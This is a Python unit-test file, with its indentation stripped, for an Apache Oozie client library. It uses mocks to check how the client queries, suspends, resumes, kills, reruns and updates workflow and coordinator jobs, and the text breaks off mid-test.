def test_jobs_all_active_workflows(self, api, sample_workflow_running):
expected_statuses = model.WorkflowStatus.active()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_workflow_running]
api.jobs_all_active_workflows()
mock_query.assert_called_with(
model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses
)
api.jobs_all_active_workflows(user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses
)
def test_jobs_all_running_workflows(self, api, sample_workflow_running):
expected_statuses = model.WorkflowStatus.running()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_workflow_running]
api.jobs_all_running_workflows()
mock_query.assert_called_with(
model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses
)
api.jobs_all_running_workflows(user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses
)
def test_jobs_running_workflows(self, api, sample_workflow_running):
expected_statuses = model.WorkflowStatus.running()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_workflow_running]
api.jobs_running_workflows('my_workflow')
mock_query.assert_called_with(
model.ArtifactType.Workflow,
details=True,
name='my_workflow',
user=None,
status=expected_statuses)
api.jobs_running_workflows('my_workflow', user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Workflow,
details=True,
name='my_workflow',
user='john_doe',
status=expected_statuses)
def test_jobs_last_workflow_parameters(self, api, sample_workflow_running):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_workflow_running]
api.jobs_last_workflow('my_workflow')
mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=1)
api.jobs_last_workflow('my_workflow', user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=1)
def test_jobs_workflow_names_parameters(self, api):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = []
api.jobs_workflow_names()
mock_query.assert_called_with(model.ArtifactType.Workflow, user=None, details=False, limit=0)
api.jobs_workflow_names(user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Workflow, user='john_doe', details=False, limit=0)
def test_jobs_all_coordinators(self, api, sample_coordinator_running):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_running]
api.jobs_all_coordinators()
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, name=None, user=None, limit=0
)
api.jobs_all_coordinators(name='my_coordinator')
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=0
)
api.jobs_all_coordinators(user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, name=None, user='john_doe', limit=0
)
api.jobs_all_coordinators(name='my_coordinator', user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator,
details=True,
name='my_coordinator',
user='john_doe',
limit=0)
api.jobs_all_coordinators(name='my_coordinator', limit=1)
mock_query.assert_called_with(
model.ArtifactType.Coordinator,
details=True,
name='my_coordinator',
user=None,
limit=1)
def test_jobs_all_active_coordinators(self, api, sample_coordinator_running):
expected_statuses = model.CoordinatorStatus.active()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_running]
api.jobs_all_active_coordinators()
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses
)
api.jobs_all_active_coordinators(user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses
)
def test_jobs_all_running_coordinators(self, api, sample_coordinator_running):
expected_statuses = model.CoordinatorStatus.running()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_running]
api.jobs_all_running_coordinators()
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses
)
api.jobs_all_running_coordinators(user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses
)
def test_jobs_all_suspended_coordinators(self, api, sample_coordinator_suspended):
expected_statuses = model.CoordinatorStatus.suspended()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_suspended]
api.jobs_all_suspended_coordinators()
mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, status=expected_statuses)
api.jobs_all_suspended_coordinators(user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', status=expected_statuses)
def test_jobs_running_coordinators(self, api, sample_coordinator_running):
expected_statuses = model.CoordinatorStatus.running()
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_running]
api.jobs_running_coordinators('my_coordinator')
mock_query.assert_called_with(
model.ArtifactType.Coordinator,
name='my_coordinator',
user=None,
status=expected_statuses)
api.jobs_running_coordinators('my_coordinator', user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator,
name='my_coordinator',
user='john_doe',
status=expected_statuses)
def test_jobs_last_coordinator_parameters(self, api, sample_coordinator_running):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_coordinator_running]
api.jobs_last_coordinator('my_coordinator')
mock_query.assert_called_with(model.ArtifactType.Coordinator, name='my_coordinator', user=None, limit=1)
api.jobs_last_coordinator('my_coordinator', user='john_doe')
mock_query.assert_called_with(
model.ArtifactType.Coordinator,
name='my_coordinator',
user='john_doe',
limit=1)
def test_jobs_coordinator_names_parameters(self, api):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = []
api.jobs_coordinator_names()
mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, details=False)
api.jobs_coordinator_names(user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', details=False)
class TestOozieClientJobCoordinatorQuery(object):
def test_coordinator_query_parameters(self, api):
mock_coord = {
'total': 0,
'coordJobId': SAMPLE_COORD_ID,
'actions': []
}
mock_action = {
'id': SAMPLE_COORD_ACTION,
}
with mock.patch.object(api, '_get') as mock_get:
def dummy_get(url):
if url.startswith('job/' + SAMPLE_COORD_ID + '?'):
return mock_coord
elif url.startswith('job/' + SAMPLE_COORD_ID + '@'):
return mock_action
assert False, 'Unexpected URL'
mock_get.side_effect = dummy_get
with pytest.raises(ValueError) as err:
api._coordinator_query('foo')
assert 'Unrecognized job ID' in str(err)
assert not mock_get.called
api._coordinator_query(SAMPLE_COORD_ID)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1')
mock_get.reset_mock()
with pytest.raises(ValueError) as err:
api._coordinator_query(SAMPLE_COORD_ID + '@foo')
assert 'Unrecognized job ID' in str(err)
assert not mock_get.called
api._coordinator_query(SAMPLE_COORD_ACTION)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=12&len=1')
mock_get.assert_any_call('job/' + SAMPLE_COORD_ACTION)
mock_get.reset_mock()
api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING')
mock_get.reset_mock()
api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.running())
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID +
'?offset=1&len=1&filter=status=RUNNING;status=SUSPENDED')
mock_get.reset_mock()
with pytest.raises(ValueError) as err:
api._coordinator_query(SAMPLE_COORD_ACTION, status=model.CoordinatorActionStatus.RUNNING)
assert 'Cannot supply both coordinator action ID and status' in str(err)
assert not mock_get.called
def test_coordinator_query_limits(self, api):
mock_result = {
'total': 100,
'coordJobId': SAMPLE_COORD_ID,
'actions': []
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
with pytest.raises(ValueError) as err:
api._coordinator_query(SAMPLE_COORD_ACTION, start=1)
assert 'Cannot supply both coordinator action ID and start / limit' in str(err)
with pytest.raises(ValueError) as err:
api._coordinator_query(SAMPLE_COORD_ACTION, limit=10)
assert 'Cannot supply both coordinator action ID and start / limit' in str(err)
api._coordinator_query(SAMPLE_COORD_ID)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1')
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=100')
api._coordinator_query(SAMPLE_COORD_ID, start=10)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=1')
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=91')
api._coordinator_query(SAMPLE_COORD_ID, limit=10)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?order=desc&offset=1&len=10')
api._coordinator_query(SAMPLE_COORD_ID, start=10, limit=10)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10')
api._coordinator_query(SAMPLE_COORD_ID, start=99, limit=10)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=99&len=10')
api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING, start=10, limit=10)
mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10&filter=status=RUNNING')
def test_coordinator_query_exception(self, api):
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
with pytest.raises(exceptions.OozieException) as err:
api._coordinator_query(SAMPLE_COORD_ID)
assert "Coordinator '" + SAMPLE_COORD_ID + "' not found" in str(err)
assert 'A bad thing' in str(err.value.caused_by)
def test_coordinator_action_query(self, api):
mock_result = {
'id': SAMPLE_COORD_ACTION,
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
mock_coord = mock.Mock()
mock_coord.actions = {}
action = api._coordinator_action_query(SAMPLE_COORD_ID, 12, coordinator=mock_coord)
mock_get.assert_called_with('job/' + SAMPLE_COORD_ACTION)
assert action._parent == mock_coord
def test_coordinator_action_query_exception(self, api):
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
with pytest.raises(exceptions.OozieException) as err:
api._coordinator_action_query(SAMPLE_COORD_ID, 12)
assert "Coordinator action '" + SAMPLE_COORD_ID + "@12' not found" in str(err)
assert 'A bad thing' in str(err.value.caused_by)
def test_decode_coord_id(self, api, sample_coordinator_running):
with mock.patch.object(api, 'jobs_last_coordinator') as mock_last:
mock_last.return_value = mock.Mock(coordJobId=SAMPLE_COORD_ID)
with pytest.raises(ValueError) as err:
api._decode_coord_id()
assert 'Supply exactly one of coordinator_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, name='my_coordinator')
assert 'Supply exactly one of coordinator_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, user='john_doe')
assert 'User parameter not supported with coordinator_id' in str(err)
result = api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID)
assert result == SAMPLE_COORD_ID
result = api._decode_coord_id(name='my_coordinator')
assert result == SAMPLE_COORD_ID
mock_last.assert_called_with(name='my_coordinator', user=None)
result = api._decode_coord_id(name='my_coordinator', user='john_doe')
assert result == SAMPLE_COORD_ID
mock_last.assert_called_with(name='my_coordinator', user='john_doe')
mock_last.return_value = None
with pytest.raises(exceptions.OozieException) as err:
api._decode_coord_id(name='my_coordinator')
assert "Coordinator 'my_coordinator' not found" in str(err)
result = api._decode_coord_id(coordinator=sample_coordinator_running)
assert result == SAMPLE_COORD_ID
with pytest.raises(ValueError) as err:
api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, coordinator=sample_coordinator_running)
assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_coord_id(name='my_coordinator', coordinator=sample_coordinator_running)
assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_coord_id(coordinator=sample_coordinator_running, user='john_doe')
assert 'User parameter not supported with coordinator object' in str(err)
def test_job_coordinator_info(self, api):
with mock.patch.object(api, '_coordinator_query') as mock_query:
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
mock_decode.return_value = SAMPLE_COORD_ID
api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID)
mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
api.job_coordinator_info(name='my_coordinator')
mock_decode.assert_called_with(None, 'my_coordinator', None)
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
api.job_coordinator_info(name='my_coordinator', user='john_doe')
mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe')
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID, limit=10)
mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=10)
def test_job_last_coordinator_info(self, api):
with mock.patch.object(api, '_coordinator_query') as mock_query:
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
mock_decode.return_value = SAMPLE_COORD_ID
api.job_last_coordinator_info(coordinator_id=SAMPLE_COORD_ID)
mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)
api.job_last_coordinator_info(name='my_coordinator')
mock_decode.assert_called_with(None, 'my_coordinator', None)
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)
api.job_last_coordinator_info(name='my_coordinator', user='john_doe')
mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe')
mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)
def test_job_coordinator_action(self, api):
with mock.patch.object(api, '_coordinator_action_query') as mock_query:
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
mock_decode.return_value = SAMPLE_COORD_ID
api.job_coordinator_action(SAMPLE_COORD_ACTION)
mock_decode.assert_called_with(SAMPLE_COORD_ACTION, None, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
api.job_coordinator_action(SAMPLE_COORD_ID, action_number=12)
mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
api.job_coordinator_action(name='my_coordinator', action_number=12)
mock_decode.assert_called_with(None, 'my_coordinator', None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
api.job_coordinator_action(name='my_coordinator', user='john_doe', action_number=12)
mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None)
mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
with pytest.raises(ValueError) as err:
api.job_coordinator_action(SAMPLE_COORD_ACTION, action_number=12)
assert 'Supply exactly one of coordinator_id or action_number' in str(err)
with pytest.raises(ValueError) as err:
api.job_coordinator_action(name='my_coordinator')
assert 'No action_number supplied' in str(err)
def test_job_coordinator_all_active_actions(self, api, sample_coordinator_running,
sample_coordinator_action_running):
with mock.patch.object(api, '_coordinator_query') as mock_query:
mock_query.return_value = sample_coordinator_action_running.parent()
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
mock_decode.return_value = SAMPLE_COORD_ID
api.job_coordinator_all_active_actions(coordinator_id=SAMPLE_COORD_ID)
mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
api.job_coordinator_all_active_actions(name='my_coordinator')
mock_decode.assert_called_with(None, 'my_coordinator', None, None)
mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
api.job_coordinator_all_active_actions(name='my_coordinator', user='john_doe')
mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None)
mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
sample_coordinator = copy.copy(sample_coordinator_running)
sample_coordinator.actions = None
api.job_coordinator_all_active_actions(coordinator=sample_coordinator)
mock_decode.assert_called_with(None, None, None, sample_coordinator)
mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
assert sample_coordinator.actions
assert sample_coordinator.actions[12] == sample_coordinator_action_running
class TestOozieClientJobWorkflowQuery(object):
def test_workflow_query_parameters(self, api):
mock_result = {
'total': 0,
'id': SAMPLE_WF_ID,
'actions': []
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
with pytest.raises(ValueError) as err:
api._workflow_query('foo')
assert 'Unrecognized job ID' in str(err)
api._workflow_query(SAMPLE_WF_ID)
mock_get.assert_called_with('job/' + SAMPLE_WF_ID)
api._workflow_query(SAMPLE_WF_ACTION)
mock_get.assert_called_with('job/' + SAMPLE_WF_ID)
def test_workflow_query_exception(self, api):
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
with pytest.raises(exceptions.OozieException) as err:
api._workflow_query(SAMPLE_WF_ID)
assert "Workflow '" + SAMPLE_WF_ID + "' not found" in str(err)
assert 'A bad thing' in str(err.value.caused_by)
def test_decode_wf_id(self, api):
with mock.patch.object(api, 'jobs_last_workflow') as mock_last:
mock_last.return_value = mock.Mock(id=SAMPLE_WF_ID)
with pytest.raises(ValueError) as err:
api._decode_wf_id()
assert 'Supply exactly one of workflow_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_wf_id(workflow_id=SAMPLE_WF_ID, name='my_workflow')
assert 'Supply exactly one of workflow_id or name' in str(err)
with pytest.raises(ValueError) as err:
api._decode_wf_id(workflow_id=SAMPLE_WF_ID, user='john_doe')
assert 'User parameter not supported with workflow_id' in str(err)
result = api._decode_wf_id(workflow_id=SAMPLE_WF_ID)
assert result == SAMPLE_WF_ID
result = api._decode_wf_id(name='my_workflow')
assert result == SAMPLE_WF_ID
mock_last.assert_called_with(name='my_workflow', user=None)
result = api._decode_wf_id(name='my_workflow', user='john_doe')
assert result == SAMPLE_WF_ID
mock_last.assert_called_with(name='my_workflow', user='john_doe')
mock_last.return_value = None
with pytest.raises(exceptions.OozieException) as err:
api._decode_wf_id(name='my_workflow')
assert "Workflow 'my_workflow' not found" in str(err)
def test_job_workflow_info(self, api):
with mock.patch.object(api, '_workflow_query') as mock_query:
with mock.patch.object(api, '_decode_wf_id') as mock_decode:
mock_decode.return_value = SAMPLE_WF_ID
api.job_workflow_info(workflow_id=SAMPLE_WF_ID)
mock_decode.assert_called_with(SAMPLE_WF_ID, None, None)
mock_query.assert_called_with(SAMPLE_WF_ID)
api.job_workflow_info(name='my_workflow')
mock_decode.assert_called_with(None, 'my_workflow', None)
mock_query.assert_called_with(SAMPLE_WF_ID)
api.job_workflow_info(name='my_workflow', user='john_doe')
mock_decode.assert_called_with(None, 'my_workflow', 'john_doe')
mock_query.assert_called_with(SAMPLE_WF_ID)
class TestOozieClientJobQuery(object):
def test_job_info(self, api):
with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info:
with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info:
api.job_info(SAMPLE_COORD_ID)
mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
assert not mock_workflow_info.called
mock_coord_info.reset_mock()
api.job_info(SAMPLE_COORD_ACTION)
mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION)
assert not mock_workflow_info.called
mock_coord_info.reset_mock()
api.job_info(SAMPLE_WF_ID)
mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
assert not mock_coord_info.called
mock_workflow_info.reset_mock()
api.job_info(SAMPLE_WF_ACTION)
mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION)
assert not mock_coord_info.called
mock_workflow_info.reset_mock()
with pytest.raises(exceptions.OozieException) as err:
api.job_info("wat?")
assert "'wat?' does not match any known job" in str(err)
assert not mock_coord_info.called
assert not mock_workflow_info.called
def test_job_action_info(self, api):
with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info:
with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info:
api.job_action_info(SAMPLE_COORD_ID)
mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
assert not mock_coord_info.action.called
assert not mock_workflow_info.called
mock_coord_info.reset_mock()
api.job_action_info(SAMPLE_COORD_ACTION)
mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION)
mock_coord_info().action.assert_called_with(12)
assert not mock_workflow_info.called
mock_coord_info.reset_mock()
api.job_action_info(SAMPLE_WF_ID)
mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
assert not mock_workflow_info.action.called
assert not mock_coord_info.called
mock_workflow_info.reset_mock()
api.job_action_info(SAMPLE_WF_ACTION)
mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION)
mock_workflow_info().action.assert_called_with('foo')
assert not mock_coord_info.called
mock_workflow_info.reset_mock()
with pytest.raises(exceptions.OozieException) as err:
api.job_action_info("wat?")
assert "'wat?' does not match any known job" in str(err)
assert not mock_coord_info.called
assert not mock_workflow_info.called
class TestOozieClientJobCoordinatorManage(object):
def test_fetch_coordinator_or_action(self, api, sample_coordinator_running, sample_coordinator_action_running):
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
with mock.patch.object(api, 'job_coordinator_info') as mock_info:
mock_decode.return_value = SAMPLE_COORD_ID
mock_info.return_value = sample_coordinator_running
result = api._fetch_coordinator_or_action(SAMPLE_COORD_ID)
assert result == sample_coordinator_running
assert mock_decode.called
assert mock_info.called
with mock.patch.object(api, '_decode_coord_id') as mock_decode:
with mock.patch.object(api, 'job_coordinator_info') as mock_info:
mock_decode.return_value = SAMPLE_COORD_ACTION
mock_info.return_value = sample_coordinator_action_running.coordinator()
result = api._fetch_coordinator_or_action(SAMPLE_COORD_ACTION)
assert result == sample_coordinator_action_running
assert mock_decode.called
assert mock_info.called
def test_job_coordinator_suspend_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_running
assert api.job_coordinator_suspend(SAMPLE_COORD_ID)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_suspended
assert not api.job_coordinator_suspend(SAMPLE_COORD_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_suspend_coordinator_action(self, api, sample_coordinator_action_running,
sample_coordinator_action_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_action_running
assert api.job_coordinator_suspend(SAMPLE_COORD_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend&type=action&scope=12')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_action_suspended
assert not api.job_coordinator_suspend(SAMPLE_COORD_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_resume_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_suspended
assert api.job_coordinator_resume(SAMPLE_COORD_ID)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_running
assert not api.job_coordinator_resume(SAMPLE_COORD_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_resume_coordinator_action(self, api, sample_coordinator_action_running,
sample_coordinator_action_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_action_suspended
assert api.job_coordinator_resume(SAMPLE_COORD_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume&type=action&scope=12')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_action_running
assert not api.job_coordinator_resume(SAMPLE_COORD_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_kill_coordinator(self, api, sample_coordinator_running, sample_coordinator_killed):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_running
assert api.job_coordinator_kill(SAMPLE_COORD_ID)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_killed
assert not api.job_coordinator_kill(SAMPLE_COORD_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_kill_coordinator_action(self, api, sample_coordinator_action_running,
sample_coordinator_action_killed):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_action_running
assert api.job_coordinator_kill(SAMPLE_COORD_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill&type=action&scope=12')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_action_killed
assert not api.job_coordinator_kill(SAMPLE_COORD_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_rerun(self, api, sample_coordinator_action_running,
sample_coordinator_action_killed,
sample_coordinator_action_killed_with_killed_coordinator):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_action_killed
assert api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID +
'?action=coord-rerun&type=action&scope=12&refresh=true')
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_action_killed_with_killed_coordinator
assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
assert not mock_put.called
mock_put.reset_mock()
mock_info.return_value = sample_coordinator_action_running
assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_coordinator_rerun_only_supports_actions(self, api, sample_coordinator_running):
with mock.patch.object(api, 'job_action_info') as mock_info:
mock_info.return_value = sample_coordinator_running
with pytest.raises(ValueError) as value_error:
api.job_coordinator_rerun(SAMPLE_COORD_ID)
assert str(value_error.value) == 'Rerun only supports coordinator action IDs'
def test_job_coordinator_update(self, api, sample_coordinator_running, sample_coordinator_killed):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_coordinator_info') as mock_info:
mock_info.return_value = sample_coordinator_running
mock_put.return_value = {'update': {'diff': "****Empty Diff****"}}
coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-minimal')
conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-minimal')
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf)
mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
assert coord is sample_coordinator_running
mock_put.reset_mock()
mock_info.reset_mock()
mock_info.return_value = sample_coordinator_running
mock_put.return_value = {'update': {'diff': "*****Diffs*****"}}
coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-full')
mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf)
mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
assert coord is sample_coordinator_running
mock_put.reset_mock()
mock_info.reset_mock()
mock_info.return_value = sample_coordinator_killed
with pytest.raises(exceptions.OozieException) as err:
api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
assert 'coordinator status must be active in order to update' in str(err)
mock_info.return_value = sample_coordinator_running
mock_put.return_value = {}
with pytest.raises(exceptions.OozieException) as err:
api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full')
assert 'update coordinator' in str(err)
class TestOozieClientJobWorkflowManage(object):
def test_job_workflow_suspend_workflow(self, api, sample_workflow_running, sample_workflow_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_running
assert api.job_workflow_suspend(SAMPLE_WF_ID)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_suspended
assert not api.job_workflow_suspend(SAMPLE_WF_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_workflow_suspend_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_running
assert api.job_workflow_suspend(SAMPLE_WF_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_suspended
assert not api.job_workflow_suspend(SAMPLE_WF_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_workflow_resume_workflow(self, api, sample_workflow_running, sample_workflow_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_suspended
assert api.job_workflow_resume(SAMPLE_WF_ID)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_running
assert not api.job_workflow_resume(SAMPLE_WF_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_workflow_resume_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
